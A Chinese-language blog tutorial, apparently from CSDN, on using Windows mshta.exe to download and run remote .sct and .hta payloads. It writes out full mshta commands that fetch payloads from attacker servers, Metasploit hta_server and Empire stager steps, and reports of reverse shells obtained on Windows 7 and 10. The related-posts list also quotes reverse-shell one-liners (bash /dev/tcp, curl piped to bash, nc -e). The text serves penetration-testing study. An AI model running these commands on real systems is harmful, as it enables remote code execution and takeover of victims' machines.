Windows文件传输及执行—mshta

最新推荐文章于 2025-07-30 10:10:38 发布
原创 最新推荐文章于 2025-07-30 10:10:38 发布 · 2.9k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了Windows系统中mshta用于下载和执行文件的过程,特别是.sct和.hta文件的执行方式。内容包括不同版本Windows的文件缓存路径、WebDAV的下载条件以及metasploit和Empire框架如何支持.hta文件执行来反弹shell的示例。

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Mshta下载&执行

mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下:

mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))

其中,进行网络调用的进程为mshta.exe,本地缓存IE local cache。
执行.hta文件的命令格式如下:

mshta http://webserver/payload.hta

 metasploit的exploit/windows/misc/hta_server支持.hta文件的执行:
use exploit/windows/misc/hta_server
配置对应的参数后,在目标主机cmd下执行:
mshta http://192.168.49.160:8080/c3a4XKrdsu3L.hta
在win7和win10测试,都可成功反弹shell:
在这里插入图片描述
 Empire也支持.hta的payload:

usestager windows/hta

然后在目标主机执行:

mshta http://192.168.49.160:8000/payload.hta

win7,10成功:
在这里插入图片描述
使用UNC路径的命令格式为:

mshta \\webdavserver\folder\payload.hta

其中,进行网络调用的进程为svchost.exe,payload位置:WebDav本地缓存。

使用mshta调用js或vbs脚本隐藏cmd窗口
我不是码农的博客~~~
12-17 929
【代码】使用mshta调用js或vbs脚本隐藏cmd窗口。
mshta工具的使用
b312738566的博客
12-26 1584
gpedit.msc->用户配置->管理模板->系统->不要运行指定windows程序->已启用->显示->加入禁用->应用->运行linux生成的链接命令;
shell反弹记录
qq_40327508的博客
12-25 382
bash -i >& /dev/tcp/ip/port 0>&1 bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 curl http://174.1.73.154/shell.txt|bash nc -e /bin/sh ip port python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STRE
HTA漏洞利用:防范Windows HTA远程执行代码攻击
最新发布
weixin_32445049的博客
07-30 722
HTA(HTML Application)是一种特殊的文件格式,它允许开发者使用标准的Web技术(如HTML、CSS和JavaScript)来创建独立的桌面应用程序。这些应用程序完全运行于Windows环境,并且具有访问操作系统功能的能力,例如文件系统和注册表。
【bat脚本】一文带你玩转bat脚本命令到自动化应用
热门推荐
weixin_51360020的博客
11-19 1万+
BAT脚本是一种简单而强大的自动化工具,适用于Windows操作系统。通过掌握基础语法、常用命令、控制语句及高级技巧,并学会解决中文乱码问题,我们可以编写出功能强大的批处理脚本,实现各种自动化任务。而随着技术的不断发展和进步,BAT脚本仍然具有一定的应用场景和需求,值得深入学习和探索,这里也希望本文对您学习和使用 Bat 脚本有所帮助,并在工作中发挥出它的潜力和价值。我是Wasteland,下期文章再见!
利用微软的 HTML 应用程序宿主程序的攻击
zhaoyong631的博客
03-11 1172
mshta.exe是微软的(Microsoft HTML Application Host),属于 Windows 系统组件。它的核心功能是运行.hta(HTML Application)文件,允许通过 HTML、JavaScript、VBScript 等技术创建交互式图形界面应用。
bat中使用mshta调用vbs语句获取精准计算的日期
wengek的博客
09-17 1273
1.在bat中,获取指定的日期格式是比较麻烦的。因为cmd环境中,日期格式随着系统的时间格式设置而变化,通常系统默认的时间格式是“\’”符号作为连接符。 日期通常用在文件名上,比如日志的文件名。那么日期的格式就只能用“-”符号代替,更改系统日期格式会显得容易被外界因素改变,导致不稳定。当然也可以用bat中的set来进行替换,但这样费代码量。 2.对于计算日期来说,bat是难以准确做到的,也需要堆积代码量才能完成。特别是到了每个月的一号时,无法确定昨天是否是31号还是30号还是28号。那么bat就只能陷入迷茫
Win7系统提示找不到mshta.exe文件的解决办法
file
03-04 1169
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mshta.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现mshta.exe丢失要怎么解决?
Windows文件下载执行的15种姿势1
08-03
简单文件传输协议(TFTP)基于UDP,用于快速、简单的文件传输,特别适合小文件传输。 8. **WinSCP**: WinSCP是一个支持SSH的图形化SFTP客户端,提供命令行模式,可以方便地进行文件的上传和下载。 9. **msiexec...
Windows&Linux文件传输方式总结
「 虚幻私塾」
03-29 3081
Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件传输方式。 Windows 利用FTP协议上传 在本地或者VPS上搭建FTP服务器,通过简单的FTP命令即可实现文件的上传。常用的FTP命令
cmd脚本-bat批处理-mshta-btoa.zip
05-22
在信息技术领域,cmd脚本和bat批处理文件是常用的自动化工具,它们可以帮助用户通过命令行界面快速执行一系列操作。MSHTA(Microsoft HTML Application Host)是一个Windows系统组件,可以用来运行基于HTML的应用...
利用mshta调用运行js或vbs的
09-06
mshta同时调用js和vbs
cmd批处理脚本通过mshta实现atob编码解码
Windows操作系统中,批处理(Batch Processing)是一种通过编写脚本文件来自动执行一系列命令的方式,广泛应用于系统管理、自动化任务、软件部署以及日常运维工作中。标题“cmd脚本-bat批处理-mshta-atob.zip”所...
Robocopy实战文件备份
taylorandtony的博客
10-11 3775
robocopy 是 windows 系统自带的一个强大的命令行文件夹/文件复制工具,它有非常多的参数可以配置。在数据同步中,robocopy 可用于编写自动同步脚本。
mshta简介
wkm
12-14 6640
mshta.exe,HTML Application HOST,HTML应用程序主机,hta文件解释器(也能解释html),就如同IE是html的解释器,CMD是批处理文件的解释器,WScript.exe、CScript.exe是vbs/js脚本的解释器。mshta的命令行参数似乎并未公开,mshta /? 等方式得不到任何帮助信息。大家如果感兴趣可以去csdn或微软的msdn查查。从网上我仅找到...
mshta命令用法示例(在dos命令弹出消息框)
liaomin416100569的专栏
09-25 1万+
JS:  复制代码代码如下: mshta vbscript:window.execScript("alert('hello world!');","javascript")  VBS:  复制代码代码如下: mshta javascript:window.execScript("msgBox('hello world!'):window.clo
Windows7系统mshta.exe文件丢失问题
amio555的专栏
12-21 1158
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mshta.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现mshta.exe丢失要怎么解决?
启动应用程序出现mshta.exe找不到问题解决
wbcmbfy的博客
06-16 1513
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个mshta.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现mshta.exe丢失要怎么解决?
windows显示Linux对话框程序,在cmd命令行中弹出Windows对话框(使用mshta.exe命令)...
weixin_42207707的博客
05-07 1621
有时候用bat写一些小脚本最后会弹出对话框提示操作成功,可以用mshta.exe来实现,它是Windows系统的相关程序,用来执行.HTA文件,一般计算机上面都有这个程序,实现如下:mshta vbscript:msgbox("我是提示内容",64,"我是提示标题")(window.close)弹出对话框如下图:如果没有mshta这个程序的话,那么就临时产生一个vbs脚本来实现,完了再删除这个脚本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值